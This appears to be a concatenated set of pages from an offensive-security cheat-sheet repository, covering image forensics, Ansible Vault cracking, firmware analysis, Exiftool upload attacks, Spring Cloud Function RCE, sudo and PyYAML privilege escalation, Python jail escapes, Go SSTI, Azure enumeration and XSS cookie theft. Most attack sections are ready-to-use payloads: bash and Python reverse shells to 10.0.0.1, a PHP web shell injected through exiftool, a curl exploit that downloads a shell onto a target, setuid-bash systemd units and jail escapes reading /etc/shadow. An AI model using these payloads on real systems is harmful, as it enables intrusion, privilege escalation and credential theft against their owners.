# Image Analysis for Machine Learning

Investigate images to find sensitive/secret data or information hidden in them.

First, load an image using **Pillow (PIL)**.
```py
import numpy as np
from PIL import Image

img = Image.open("example.png")
```

## Basic Information

```py
# Filename
img.filename

# Image information
img.info

# Image format (PNG, JPG, etc.)
img.format

# Color mode (RGB, CMYK, etc.)
img.mode

# Image size
img.size

# Bytes
img.tobytes()

# Pixels
np.array(img.getdata())
```

### Plot Images

```py
import matplotlib.pyplot as plt

plt.imshow(img)
plt.axis('off') # Turn off axis and labels
plt.show()
```

## Hidden Information

Find hidden data in the image by slightly transforming it.

### Resize Image & Get Bytes

```py
img1 = img.resize((128, 128))
print(img1.tobytes())
```

### XOR Image Bytes

```py
# Convert image to bytes
data = img.tobytes()

key = 2 # specify the XOR key

xored = []
for byte in data:
    xored.append(byte ^ key)
xored_np = np.array(xored)
print(xored_np)
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/ansible-vault-secret.md:
--------------------------------------------------------------------------------

# Ansible Vault Secret

Ansible Vault can encrypt a file which includes sensitive data. However, we may be able to decrypt the file with the password, or by cracking the hash to retrieve the password.

## Decryption

First check the file encrypted with Ansible Vault.
```bash
cat example.yml

# -- output --
$ANSIBLE_VAULT;1.1;AES256
62313365396662343061393464336163383764373764613633653634306231386433626436623361
6134333665353966363534333632666535333761666131620a663537646436643839616531643561
63396265333966386166373632626539326166353965363262633030333630313338646335303630
3438626666666137650a353638643435666633633964366338633066623234616432373231333331
6564
```

We can use **`ansible2john`** to generate a hash in a crackable format.

```bash
ansible2john example.yml > hash.txt
```

Then crack this hash using **John The Ripper** or **Hashcat**.

```bash
john --wordlist=wordlist.txt hash.txt
# or
# -m 16900: Ansible Vault hash mode
hashcat -a 0 -m 16900 hash.txt wordlist.txt
```

After cracking and retrieving the password, we can use it to decrypt the file as below.

```bash
ansible-vault decrypt example.yml --output decrypted.txt
```

## References

- [Ansible Docs](https://docs.ansible.com/ansible/2.9/user_guide/vault.html#)

--------------------------------------------------------------------------------
/docs/exploit/hardware/firmware-analysis.md:
--------------------------------------------------------------------------------

# Firmware Analysis

## Static Analysis

The following tools are useful for static analysis.
- **[Firmwalker](https://github.com/craigz28/firmwalker)**
- **[firmware-mod-kit](https://code.google.com/archive/p/firmware-mod-kit/)**

```sh
file ./firmware

binwalk ./firmware
# -M: Matryoshka (recursively) scan extracted files
# -r: Delete carved files after extracting
# -e: Extract known file types
binwalk -Mre ./firmware
# -E: Calculate file entropy
# -N: Do not generate an entropy plot graph
binwalk -EN ./firmware

# firmware-mod-kit
./extract-firmware.sh ./firmware
```

## Dynamic Analysis

```sh
gdb ./firmware
rizin ./firmware
```

### Using FIRMADYNE

**[FIRMADYNE](https://github.com/firmadyne/firmadyne)** is a platform for emulation and dynamic analysis of Linux-based firmware.

```sh
# Analyze and emulate the system
./fat.py example.squashfs
```

The analysis will start.
Copy the IP address from the output as below.

```sh
Network interfaces: [('brtrunk', '192.168.0.100')]
```

On the local machine, port forward using that IP.

```sh
ssh -L 8081:192.168.0.100:80 remote-user@
```

Now we can access http://127.0.0.1:8081/.

--------------------------------------------------------------------------------
/docs/exploit/web/file-upload-attack-on-exiftool.md:
--------------------------------------------------------------------------------

# File Upload Attack on Exiftool

If a website uses Exiftool to analyze uploaded files, we might be able to exploit its vulnerabilities.

## Polyglot Attack

We might be able to execute remote code by turning a plain image file into a polyglot.
First, create a blank image file as below (this step is not required if you already have an image file).
```sh
convert -size 32x32 xc:white test.jpg
```

Then insert an **OS command** with **exiftool**.

```sh
exiftool -Comment="" example.png
exiftool -Comment='"; system($_GET['cmd']); ?>' exploit.png
exiftool -Comment="" example.jpg -o polyglot.php
```

## Command Injection (version < v12.38)

On Exiftool versions lower than **12.38**, we can inject an **OS command** in the filename when uploading.

```bash
# Ping
filename="touch test; ping -c 1 10.0.0.1 |"

# Reverse shell
filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |"
filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |"
filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |"
```

--------------------------------------------------------------------------------
/docs/exploit/web/framework/spring-cloud.md:
--------------------------------------------------------------------------------

# Spring Cloud Function RCE

Spring Cloud Function is vulnerable to RCE (CVE-2022-22963).

## Exploitation

### Reverse Shell

First create a reverse shell script on the local machine.

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
```

Then start a web server to serve it.

```bash
# port 80, to match the wget URL used below
sudo python3 -m http.server 80
```

Now trigger remote code execution against the target website as below.

```bash
curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.0.0.1/shell -O /tmp/shell")' --data-raw 'data' -v
```

Our reverse shell script has been downloaded onto the target.
Start a listener on the local machine.
```bash
nc -lvnp 4444
```

Trigger remote code execution again to launch the reverse shell.

```bash
# As needed
curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell")' --data-raw 'data' -v

curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/shell")' --data-raw 'data' -v
```

## References

- [me2nuk](https://github.com/me2nuk/CVE-2022-22963)

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/amqp.md:
--------------------------------------------------------------------------------

# AMQP (Advanced Message Queuing Protocol)

AMQP is an open standard application layer protocol. Default ports are 5671, 5672.

## Connect

We can use the `rabbitmqctl` command for interacting with the AMQP server from a remote machine.
If it does not exist on your machine, install it with the following command:

```bash
sudo apt install rabbitmq-server
```

Now we can use it.

```bash
# Get status
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ status

# Get all users
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ list_users

# Dump user password hashes (format: Base64-encoded RabbitMQ salted SHA-256)
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ export_definitions /tmp/output.json
```

## Get Password

If we get the password hash after the `rabbitmqctl export_definitions` command, we can try to recover the password from it.
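RabbitMQ's default password hash is base64(salt || SHA-256(salt || password)) with a 4-byte salt. The following added Python is mine, not code from the original page: it implements that format so an exported definitions file can be audited against a list of known-weak passwords. The sample export is constructed, and the JSON field names (`users`, `name`, `password_hash`, `hashing_algorithm`) are assumed from RabbitMQ's definitions export.

```python
import base64
import hashlib
import hmac
import os


def rabbitmq_hash(password: str, salt: bytes = None) -> str:
    """Hash in RabbitMQ's default (rabbit_password_hashing_sha256) format:
    BASE64(salt || SHA256(salt || password)) with a 4-byte random salt."""
    if salt is None:
        salt = os.urandom(4)
    if len(salt) != 4:
        raise ValueError("RabbitMQ uses a 4-byte salt")
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return base64.b64encode(salt + digest).decode("ascii")


def split_hash(b64hash: str) -> tuple:
    """Return (salt_hex, sha256_hex); the second value is what the
    `base64 -d | xxd -p | cut -c9-` pipeline on this page prints."""
    raw = base64.b64decode(b64hash)
    if len(raw) != 4 + 32:
        raise ValueError(f"{len(raw)} bytes is not a salted SHA-256 hash")
    return raw[:4].hex(), raw[4:].hex()


def verify(b64hash: str, candidate: str) -> bool:
    """Constant-time check of a candidate password against an exported hash."""
    salt_hex, digest_hex = split_hash(b64hash)
    salt = bytes.fromhex(salt_hex)
    expected = hashlib.sha256(salt + candidate.encode("utf-8")).digest()
    return hmac.compare_digest(expected, bytes.fromhex(digest_hex))


def weak_users(definitions: dict, wordlist) -> list:
    """Names of users in an export_definitions JSON whose password is in
    wordlist. Field names (users/name/password_hash/hashing_algorithm) are
    assumed from RabbitMQ's definitions export."""
    words = list(wordlist)
    found = []
    for user in definitions.get("users", []):
        algo = user.get("hashing_algorithm", "rabbit_password_hashing_sha256")
        if algo != "rabbit_password_hashing_sha256":
            continue  # md5/sha512 variants exist; only the default is handled
        if any(verify(user["password_hash"], w) for w in words):
            found.append(user["name"])
    return found


# Constructed sample export; fixed salts so the hashes are reproducible.
SAMPLE_DEFINITIONS = {
    "users": [
        {"name": "guest", "tags": ["administrator"],
         "hashing_algorithm": "rabbit_password_hashing_sha256",
         "password_hash": rabbitmq_hash("guest", b"\x00\x01\x02\x03")},
        {"name": "svc", "tags": [],
         "hashing_algorithm": "rabbit_password_hashing_sha256",
         "password_hash": rabbitmq_hash("correct horse battery staple", b"\xde\xad\xbe\xef")},
    ]
}

if __name__ == "__main__":
    print(weak_users(SAMPLE_DEFINITIONS, ["admin", "guest", "password"]))
```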
The hash is Base64-encoded and the format is as below by default (the `rabbit_password_hashing_sha256` algorithm):

```bash
BASE64(4_BYTE_SALT + SHA256(4_BYTE_SALT + PASSWORD))
```

So separate the SHA256 digest from the salt with the following command (paste the `password_hash` value between the quotes):

```bash
# cut -c9-: skip the first 8 hex characters (the 4-byte salt) and print the SHA256 digest.
# Keep those first 8 characters too: they are the salt needed to verify a candidate password.
echo -n '' | base64 -d | xxd -p -c 1000 | cut -c9-
```

A candidate password is checked by computing `SHA256(salt + candidate)` and comparing it with the digest, so the digest alone cannot be cracked.
-------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/reboot.md: --------------------------------------------------------------------------------
# Sudo Reboot Privilege Escalation

The `sudo reboot` command might be vulnerable to privilege escalation (PrivEsc).

## Investigation

```bash
sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot
```

If we can execute the **"reboot"** command as root and we can also write to a systemd unit that starts at boot, we can escalate privileges: whatever that unit's `ExecStart` runs is executed as root on the next boot.

## Exploitation

### 1. Find Service Config Files Which Are Writable

Look for systemd unit files that are writable by the current user.

```bash
find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service
```

### 2. Insert a Payload

If we find a writable file, we can inject a payload into **Service.ExecStart**. The unit must be enabled (linked from the target named in `WantedBy`, e.g. `multi-user.target.wants/`) or otherwise started at boot, otherwise `ExecStart` never runs; `systemctl is-enabled example.service` tells us.

```bash
# /etc/systemd/system/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home//bash; chmod +xs /home//bash'

[Install]
WantedBy=multi-user.target
```

### 3. Reboot and Get a Root Shell

Now reboot as root.

```bash
sudo /usr/sbin/reboot
```

After the system has rebooted, the command in `ExecStart` will have been executed as root.
Now we should get a root shell by executing the copied bash binary.
```bash
/home//bash -p
```
-------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-jails-escape.md: --------------------------------------------------------------------------------
# Python Jails Escape

If we are given a Python script like the following, our input is passed to `exec()`, but any input containing one of the blacklisted keywords (**"os", "system", "import", etc.**) is rejected, so the usual one-liners for escalating privileges do not get through.
It appeared in **Newbie CTF 2019**.

```python
#! /usr/bin/python3
def main():
    text = input('>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("No!!!")
            return
    else:
        # for/else: runs only when the loop was not left early, i.e. no keyword matched
        exec(text)

if __name__ == "__main__":
    main()
```

The check is a plain substring match on the raw input, so we only need to build the module and attribute names at runtime (string concatenation, `.lower()`, etc.) so that none of the keywords appears literally in the text.
[This post](https://dspyt.com/how-to-python-jail-escape-newbie-ctf-2019) explains it in detail.

## Payloads

```python
print(globals())
print(getattr(getattr(globals()['__builtins__'], '__im'+'port__')('o'+'s'), 'sys'+'tem')('cat /etc/shadow'))
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /etc/shadow')
```

Both payloads rely on `__builtins__` being the `builtins` module, which is the case when the script is run directly as `__main__`.

## Payloads (input)

If **"eval"** or **"exec"** is not in the blacklist, we can pass the blocked code through a second `input()` at runtime, because the filter only inspects the first line we typed.

```python
eval(input())
# or
exec(input())

> print(open("/etc/passwd", "r").read())
```

## References

- [DSPYT](https://dspyt.com/how-to-python-jail-escape-newbie-ctf-2019)
-------------------------------------------------------------------------------- /docs/exploit/audio/spectrogram.md: --------------------------------------------------------------------------------
# Spectrogram

A spectrogram is a visual representation of the spectrum of frequencies of a signal as it varies with time.
4 | 5 | ## Online Tools 6 | 7 | - **[Spectrum Analyzer](https://academo.org/demos/spectrum-analyzer/)** 8 | 9 | Display a spectrum of signal amplitudes on different frequencies. 10 | Upload audio file like .wav or .mp3, .ogg. 11 | 12 | - **[Spectral Analyzer](https://www.dcode.fr/spectral-analysis)** 13 | 14 | - **[Morse Code Adaptive Audio Decoder](https://morsecode.world/international/decoder/audio-decoder-adaptive.html)** 15 | 16 |
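The tools above display a spectrogram; the following is an added Python example (standard library only, not from this page or from any of the tools listed) that computes one directly, which is what you need once you want to decode a tone-coded signal rather than look at it. It synthesises a constructed 2-FSK signal (1200 Hz for a 0 bit, 2200 Hz for a 1 bit, 100 baud at 8 kHz; all of these parameters are assumptions for the example), measures the power of each candidate tone per symbol window with the Goertzel algorithm (one column of a spectrogram), and recovers the hidden text. `read_wav_mono16` loads a real 16-bit mono WAV into the same pipeline.

```python
import math
import struct
import wave

SAMPLE_RATE = 8000          # Hz (assumed for the example)
BAUD = 100                  # symbols per second -> 80 samples per symbol
F_ZERO, F_ONE = 1200.0, 2200.0   # tone for bit 0 / bit 1 (assumed); both sit on a Goertzel bin


def synth_fsk(bits, sample_rate=SAMPLE_RATE, baud=BAUD):
    """Constructed test signal: one tone per bit, continuous phase so there are no clicks."""
    n_per_sym = sample_rate // baud
    samples, phase = [], 0.0
    for bit in bits:
        step = 2 * math.pi * (F_ONE if bit else F_ZERO) / sample_rate
        for _ in range(n_per_sym):
            samples.append(0.8 * math.sin(phase))
            phase += step
    return samples


def read_wav_mono16(path):
    """Load a 16-bit mono PCM WAV as floats in [-1, 1]; returns (samples, sample_rate)."""
    with wave.open(path, "rb") as w:
        if w.getsampwidth() != 2 or w.getnchannels() != 1:
            raise ValueError("expected 16-bit mono PCM")
        raw = w.readframes(w.getnframes())
        pcm = struct.unpack("<%dh" % (len(raw) // 2), raw)
        return [s / 32768.0 for s in pcm], w.getframerate()


def goertzel_power(frame, freq, sample_rate):
    """Power of one frequency bin in a frame: a single cell of the spectrogram."""
    k = 2 * math.cos(2 * math.pi * freq / sample_rate)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + k * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - k * s1 * s2


def spectrogram(samples, freqs, frame_len, sample_rate=SAMPLE_RATE):
    """Time x frequency power grid: one row per frame, one column per probed frequency."""
    rows = []
    for start in range(0, len(samples) - frame_len + 1, frame_len):
        frame = samples[start:start + frame_len]
        rows.append([goertzel_power(frame, f, sample_rate) for f in freqs])
    return rows


def ascii_spectrogram(samples, freqs=(F_ZERO, F_ONE), frame_len=SAMPLE_RATE // BAUD):
    """Crude text rendering: one line per frame, '#' marks the dominant tone."""
    lines = []
    for row in spectrogram(samples, list(freqs), frame_len):
        peak = max(row)
        lines.append("".join("#" if p == peak else "." for p in row))
    return "\n".join(lines)


def decode_fsk(samples, sample_rate=SAMPLE_RATE, baud=BAUD):
    """Pick the stronger of the two tones in each symbol window."""
    grid = spectrogram(samples, [F_ZERO, F_ONE], sample_rate // baud, sample_rate)
    return [1 if p1 > p0 else 0 for p0, p1 in grid]


def text_to_bits(text):
    return [int(b) for c in text.encode("ascii") for b in format(c, "08b")]


def bits_to_text(bits):
    usable = len(bits) - len(bits) % 8
    chars = [int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8)]
    return bytes(chars).decode("ascii", errors="replace")


def hidden_message(text="FLAG{fsk}"):
    """Round trip: hide text as FSK audio, then recover it from the spectrogram."""
    return bits_to_text(decode_fsk(synth_fsk(text_to_bits(text))))
```

Both tones fall exactly on a bin of an 80-sample frame (100 Hz resolution), so the unused tone leaks no power into the other column; with real recordings, probe a range of frequencies and look for the pair that alternates.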
17 | 18 | ## Using Audacity 19 | 20 | Audacity is an audio editor which also can be used for decoding signals in audio files. 21 | 22 | 1. Open an audio file in Audacity. 23 | 2. Click the name of the file at left menu (which contains the reverse triangle icon). 24 | 3. In the drop-down menu, check **Spectrogram**. 25 | 4. If you want to edit advanced settings, click **Spectrogram Settings** in the menu and edit values. 26 | 5. Click **Play** button. 27 | 28 |
29 | 30 | ## Using Inspectrum 31 | 32 | [Inspectrum](https://github.com/miek/inspectrum) is a radio signal analyzer for **.cf32**, **.cf64**, etc. 33 | 34 |
35 | 36 | ## Using Rtl-433 37 | 38 | [rtl-433](https://github.com/merbanan/rtl_433) decodes radio transmissions from devices on the ISM bands. 39 | 40 | ```bash 41 | # -A: Pulse analyzer. 42 | rtl_433 -A 43 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/ethereum/python.md: -------------------------------------------------------------------------------- 1 | # Interact with Ethereum using Python 2 | 3 | ## Preparation 4 | 5 | To use **“py-solc”**, the Ethereum and Solidity are required in our system. So if you don’t have them yet, install them. 6 | 7 | ```python 8 | sudo add-apt-repository ppa:ethereum/ethereum 9 | sudo apt-get update 10 | sudo apt-get install solc 11 | ``` 12 | 13 |
14 | 15 | ## Install Python Packages 16 | 17 | ```bash 18 | pip3 install py-solc 19 | pip3 install web3 20 | ``` 21 | 22 |
23 | 24 | ## Compile Contract 25 | 26 | ```python 27 | import solc 28 | 29 | with open('MyContract.sol', 'r') as f: 30 | contract_source_code = f.read() 31 | 32 | compiled_sol = solc.compile_source(contract_source_code) 33 | 34 | contract_bytecode = compiled_sol[':MyContract']['bin'] 35 | contract_abi = compiled_sol[':MyContract']['abi'] 36 | ``` 37 | 38 |
## Interact with Ethereum Chain

Create a Python script using web3 to interact with the blockchain.

```python
from web3 import Web3

rpc_url = "http://10.0.0.1:8545"
private_key = "0x1234..."
addr = "0x1234..."
contract_addr = "0x1234..."

# Connect
w3 = Web3(Web3.HTTPProvider(rpc_url))
print(w3.is_connected())

# Get the latest block (block access lives under the `eth` namespace)
print(w3.eth.get_block('latest'))

# Get the balance (in wei) of the specified address
balance = w3.eth.get_balance(addr)
print(f"Balance is {balance} wei")
```
-------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-yaml.md: --------------------------------------------------------------------------------
# Python Yaml Privilege Escalation

PyYAML's `yaml.load()` with the default loader (PyYAML < 6.0), `Loader`, or `UnsafeLoader` constructs arbitrary Python objects from `!!python/...` tags, so a YAML document we control leads to arbitrary command execution. If the script that loads it runs as root (cron job, sudo, service), this is a privilege escalation.

## Investigation

```python
import yaml

filename = "example.yml"
with open(filename) as f:
    yaml.load(f)  # no Loader (PyYAML < 6.0), or Loader=yaml.Loader / yaml.UnsafeLoader
```

Check whether we can write to the file that is loaded and which loader is used: `yaml.safe_load` and `FullLoader` (since PyYAML 5.4) reject these tags, and on PyYAML 6.0 and later `yaml.load()` without a `Loader` argument raises a `TypeError`.

## Payloads

```python
import yaml
from yaml import Loader, UnsafeLoader

data = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'
yaml.load(data)                       # PyYAML < 6.0 only
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=UnsafeLoader)
yaml.load_all(data)                   # PyYAML < 6.0 only
yaml.load_all(data, Loader=Loader)
yaml.load_all(data, Loader=UnsafeLoader)
yaml.unsafe_load(data)
```

`load_all` returns a generator, so its document is only constructed (and the command only runs) once the result is iterated.

Now execute the copied **`bash`** with `-p` to keep the setuid privileges.

```bash
/tmp/bash -p
```

### Reverse Shell

Start a listener on the local machine.

```bash
nc -lvnp 1234
```

Then have a Python script that loads the following YAML executed as root.

```python
import yaml

payload = '!!python/object/new:os.system ["bash -c \'bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\'"]'
yaml.unsafe_load(payload)
```

### Base64 Encoding

Sometimes we might get remote code execution with a Base64-encoded payload, e.g. when the application decodes our input before loading it.

```python
from base64 import b64decode
import yaml

yaml.load(b64decode(b"ISFweXRa...YXNoIl0="), Loader=yaml.UnsafeLoader)
```

## References

- [pyyaml](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)
-------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/openvpn.md: --------------------------------------------------------------------------------
# Sudo OpenVPN Privilege Escalation

The `sudo openvpn` command might be vulnerable to privilege escalation.

## Investigation

```bash
(root) /usr/sbin/openvpn /opt/example.ovpn
```

If we can execute the **`openvpn`** command as root and we have **write permission** on the **`.ovpn`** file, we can escalate privileges.

## Exploitation

### 1. Create a Payload

First create a shell script for a reverse shell, for example **`/tmp/shell.sh`**.
Replace **``** with your local IP address.

```bash
#!/bin/bash

bash -i >& /dev/tcp//4444 0>&1
```

Then make the script executable so that root can run it.

```bash
chmod +x /tmp/shell.sh
```

### 2. Edit .ovpn File

Next edit the **`.ovpn`** file.
We need to add **"script-security 2"** and **"`up /tmp/shell.sh`"** to the configuration directives (before the inline certificates).

```bash
# /opt/example.ovpn
...
script-security 2
up /tmp/shell.sh


-----BEGIN CERTIFICATE-----
...
```

### 3. Reverse Shell

On the local machine, start a listener.

```bash
nc -lvnp 4444
```

Now execute the `openvpn` command as root.
57 | 58 | ```bash 59 | sudo /usr/sbin/openvpn /opt/example.ovpn 60 | ``` 61 | 62 | This command executes our **`shell.sh`**, so we should get a root shell. -------------------------------------------------------------------------------- /docs/exploit/web/go-ssti.md: -------------------------------------------------------------------------------- 1 | # Go SSTI 2 | 3 | Golang html template is vulnerable to SSTI (Server Side Template Injection). 4 | 5 | ## Investigation 6 | 7 | ```go 8 | import "html/template" 9 | 10 | ... 11 | 12 | template.New("foo").Parse("{{ . }}") 13 | ``` 14 | 15 | If a website uses a web framework written in Golang and uses `html/template` module for parsing a template file or strings, we may inject this template with our custom template file/string. 16 | 17 | ## Exploit 18 | 19 | Assume a web application defines `User` struct, `GetFile` method, and `ExecuteCmd` method. 20 | 21 | ```go 22 | // `main.go` of target website 23 | 24 | type User struct { 25 | Id string 26 | Name string 27 | } 28 | 29 | // Read contents of the file and output it. 30 | func GetFile(filepath string) { 31 | ... 32 | } 33 | 34 | // Execute system command. 35 | func ExecuteCmd(cmd string) { 36 | ... 37 | } 38 | ``` 39 | 40 | ### Payloads 41 | 42 | ```bash 43 | {{ . }} 44 | 45 | # Get the `User` struct values. 46 | {{ .User }} 47 | 48 | # Call the `GetFile` method to LFI. 49 | {{ .GetFile "/etc/passwd" }} 50 | 51 | # Call the `ExecuteCmd` method to RCE. 52 | {{ .ExecuteCmd "whoami" }} 53 | ``` 54 | 55 | Also, if the website parses arbitrary template file, which concludes malicious payload like above, in some way e.g. SSRF(`https://example.com/?file=http://evil.com/template.txt`) 56 | 57 | This file will be parsed by the website and lead SSTI. 
58 | 59 | ## References 60 | 61 | - [OnSecurity](https://www.onsecurity.io/blog/go-ssti-method-research/) -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/chinese-remainder-theorem.md: -------------------------------------------------------------------------------- 1 | # Chinese Remainder Theorem 2 | 3 | ## Basic 4 | 5 | If moduli (**`n1`, `n2`, etc.**) are co-primes, the following rules hold: 6 | 7 | ```python 8 | x ≡ a1 mod n1 # means `x % n1 = a1` 9 | x ≡ a2 mod n2 # means `x % n2 = a2` 10 | ... 11 | x ≡ ak mod nk # means `x % nk = ak` 12 | ``` 13 | 14 | In addition, if the values of **`a1`, `a2`, … `ak`** and **`n1`, `n2`, … `nk`** are defined, we can calculate **`x`** by the following approach. 15 | 16 | ```python 17 | # Calculate N 18 | N = n1 * n2 * n3 * ... * nk 19 | 20 | # Calculate Ni (N1, N2, ..., Nk) 21 | N1 = n2 * n3 * n4 ... * nk 22 | N2 = n1 * n3 * n4 ... * nk 23 | N3 = n1 * n2 * n4 ... * nk 24 | ... 25 | Nk = n1 * n2 * n3 ... * n(k-1) 26 | 27 | # Calculate xi (x1, x2, ..., xk) 28 | N1*x1 ≡ 1 (mod n1) # means `N1*x1 % n1 = 1` 29 | N2*x2 ≡ 1 (mod n2) # means `N2*x2 % n2 = 1` 30 | N3*x3 ≡ 1 (mod n3) # means `N3*x3 % n3 = 1` 31 | ... 32 | Nk*xk ≡ 1 (mod nk) # means `Nk*xk % nk = 1` 33 | 34 | # x is sum of each ai*Ni*xi (mod N) 35 | x = a1*N1*x1 + a2*N2*x2 + a3*N3*x3 + ... 
+ ak*Nk*xk (mod N) 36 | ``` 37 | 38 | ## Using crt method in Sympy 39 | 40 | ```python 41 | from sympy.ntheory.modular import crt 42 | 43 | m = [7, 15] 44 | a = [5, 12] 45 | (x, y) = crt(m, a) 46 | # x = 68, y = 77 47 | ``` 48 | 49 | ## References 50 | 51 | - [Wikipedia](https://en.wikipedia.org/wiki/Chinese_remainder_theorem) 52 | - [CryptoHack](https://cryptohack.org/courses/modular/crt1/) 53 | - [YouTube: Maths with Jay](https://www.youtube.com/watch?v=zIFehsBHB8o) -------------------------------------------------------------------------------- /docs/exploit/cloud/azure.md: -------------------------------------------------------------------------------- 1 | # Azure Pentesting 2 | 3 | ## Install Azure CLI 4 | 5 | To pentesting Azure, we need to install Azure CLI on our machine. See https://learn.microsoft.com/en-us/cli/azure/install-azure-cli for details. 6 | 7 | Additionally, the `Az` PowerShell module is useful. 8 | 9 | ```bash 10 | Import-Module -Name Az 11 | ``` 12 | 13 | ## Azure Blob Storage 14 | 15 | Azure Blob Storage stores static files in the URL: `https://.blob.core.windows.net/`. 
16 | We can enumerate the target storage by accessing the following URLs in browser: 17 | 18 | ```bash 19 | # Enumerate detailed information for the storage 20 | https://.blob.core.windows.net/?restype=container&comp=list 21 | 22 | # Enumerate directories 23 | https://.blob.core.windows.net/?restype=container&comp=list&delimiter=%2F 24 | 25 | # Enumerate version information 26 | https://.blob.core.windows.net/?restype=container&comp=list&include=versions 27 | # Specify version 28 | https://.blob.core.windows.net//example.txt?versionid=2021-09-20T12:34:56.789Z 29 | ``` 30 | 31 | ## Active Directory 32 | 33 | Resources: [Microsoft Docs](https://learn.microsoft.com/en-us/powershell/module/az.resources/get-azaduser?view=azps-13.0.0) 34 | 35 | ```bash 36 | # Get signin user 37 | Get-AzADUser -SignedIn 38 | 39 | # List users 40 | Get-AzADUser -First 10 -Select 'City' -AppendSelected 41 | ``` 42 | 43 | ## References 44 | 45 | - [PwnedLabs](https://pwnedlabs.io/labs/azure-blob-container-to-initial-access) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/chrome-remote-debugger.md: -------------------------------------------------------------------------------- 1 | # Chrome Remote Debugger Privilege Escalation 2 | 3 | Chrome Remote Debugger is a tool that debugs web applications. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | /usr/bin/google-chrome --remote-debugging-port=12345 9 | ``` 10 | 11 | If the target system is running **Google Chrome Debugger** with specific port, we can port forward and may be able to retrieve sensitive data in browser debugging mode. 12 | 13 | ## Exploitation 14 | 15 | ### 1. Port Forwarding 16 | 17 | First off, start port forwarding in local machine. 18 | 19 | ```bash 20 | ssh -L 12345:127.0.0.1:12345 remote-user@example.com 21 | ``` 22 | 23 | ### 2. Configure Network Targets in Chrome 24 | 25 | Assume the chrome debugger is running on port **12345**. 
26 | Open Chrome browser and input the following string in URL bar at the top of the window. 27 | 28 | ```bash 29 | chrome://inspect/#devices 30 | ``` 31 | 32 | Then click **“Configure…”** at the right of **“Discover network targets”**. The modal window opens. 33 | In the modal window, enter **“localhost:12345”** then click **“Done”**. 34 | Now we should see the remote host appears at the bottom of the **“Remote Target”**. 35 | Click **“inspect”** then new browser open. We can browse the website. 36 | 37 | ### (Option) Find Credentials 38 | 39 | If the login page found when inspecting, we may see a credential in the developer tool at the right pane. Go to `Network` and click the target page such as `login.php` then go to the `Payload` tab. We can find credentials. -------------------------------------------------------------------------------- /docs/exploit/web/cookie-hijacking.md: -------------------------------------------------------------------------------- 1 | # Cookie Hijacking 2 | 3 | A methodology of manipulating, grabbing cookies. 4 | 5 | ## Cookie Manipulation 6 | 7 | ```html 8 | Cookie: PHPSESSID=0 9 | Cookie: PHPSESSID=1 10 | Cookie: PHPSESSID=999 11 | 12 | 13 | Cookie: PHPSESSID=3836382d61646d696e 14 | ``` 15 | 16 | ## PHP Cookie Grabbing with XSS 17 | 18 | In your local machine, create the payload for grabbing the cookie when the other user will access your machine. 19 | 20 | ```php 21 | // steal_cookie.php 22 | 23 | 24 | ``` 25 | 26 | Create the JavaScript code to force users to access your machine which shows the victim's cookie value. 27 | 28 | ```javascript 29 | 30 | ``` 31 | 32 | POST request with this JavaScript code to the target web page. 33 | Open listner in your local machine and wait for the other users will access the target web page. 34 | 35 | ```sh 36 | nc -lvnp 4444 37 | ``` 38 | 39 | ## Python Cookie Stealer with XSS 40 | 41 | [This script](https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py) is useful to steal Cookie. 
42 | To start web server, execute the Python script as below. 43 | 44 | ```bash 45 | python2 XSS-cookie-stealer.py 46 | ``` 47 | 48 | Then inject our XSS to steal Cookie via our web server. 49 | For instance, 50 | 51 |
